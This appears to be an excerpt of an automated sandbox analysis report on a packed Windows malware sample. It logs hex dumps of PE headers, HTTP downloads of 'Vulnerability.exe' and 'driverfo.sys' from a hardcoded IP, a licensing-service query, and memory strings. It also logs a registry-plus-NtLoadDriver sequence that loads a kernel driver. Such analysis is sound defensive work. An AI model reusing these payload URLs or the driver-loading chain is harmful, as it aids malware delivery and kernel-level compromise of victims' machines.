00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 4c 01 00 00 10 00 00 00 4e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 cb 00 00 00 60 01 00 00 cc 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 0c 00 00 00 30 02 00 00 06 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 30 0f 00 00 00 40 02 00 00 10 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e8 01 00 00 00 50 02 00 00 02 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 01 00 00 00 60 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 Oct 2024 06:10:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sat, 19 Oct 2024 00:07:08 GMTETag: "4d00-624c93353bec7"Accept-Ranges: bytesContent-Length: 19712Keep-Alive: timeout=5, max=99Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 d4 f7 12 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 63 5e 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 fc 00 00 00 00 2a 00 00 00 23 00 00 00 70 00 00 24 00 00 00 60 32 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 31 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 12 00 00 00 10 00 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 50 06 00 00 00 30 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 8c 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 fc 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 04 03 00 00 00 60 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 62 2e 72 65 6c 6f 63 00 00 24 00 00 00 00 70 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox ViewIP Address: 104.26.0.5 104.26.0.5
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global trafficHTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /driverfo.sys HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknownTCP traffic detected without corresponding DNS query: 185.101.104.122
Source: global trafficHTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /driverfo.sys HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: keyauth.win
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/D
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E10BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/VulneH)C
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exe
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exe&
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exeJ)A
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exeLMEMXxZ
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exeT
Source: lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/Vulnerability.exeZZC:
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1042000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sys
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sys$63
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sys.122/h
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sys.6
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sysC6
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sysC:
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sysH6W
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sysLMEMHhX
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sysM6
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.sysUUC:
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.syst
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/driverfo.syst6C
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.101.104.122/h
Source: driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://certs.apple.com/wwdrg3.der01
Source: driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://crl.apple.com/root.crl0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.drString found in binary or memory: http://crl.globalsign.net/root.crl0
Source: driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://ocsp.apple.com/ocsp03-applerootca0.
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://ocsp.apple.com/ocsp03-wwdrg3010
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.2/
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.2/4-100I
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.2/fo.sysv
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:
Source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comR
Source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/
Source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/Y
Source: Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/AB6E94A209
Source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/qy
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.drString found in binary or memory: https://www.apple.com/certificateauthority/0
Source: lUAc7lqa56.exe, 00000000.00000002.1935015299.00007FF790082000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.behance.net/madetypeFree
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.drString found in binary or memory: https://www.globalsign.com/repository/03
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownHTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _stub_UserRegisterRawInputDevicesmemstr_be539d0e-1

System Summary

barindex
Detected VMProtect packer
Source: lUAc7lqa56.exeStatic PE information: .vmp0 and .vmp1 section names
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC422900 RegCreateKeyW,RegSetKeyValueW,RegCloseKey,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,RegSetKeyValueW,RegCloseKey,RegCloseKey,GetModuleHandleA,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,RtlInitUnicodeString,NtLoadDriver,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7CC422900
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4232C0 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,VirtualFree,_stricmp,VirtualFree,VirtualFree,_invalid_parameter_noinfo_noreturn,4_2_00007FF7CC4232C0
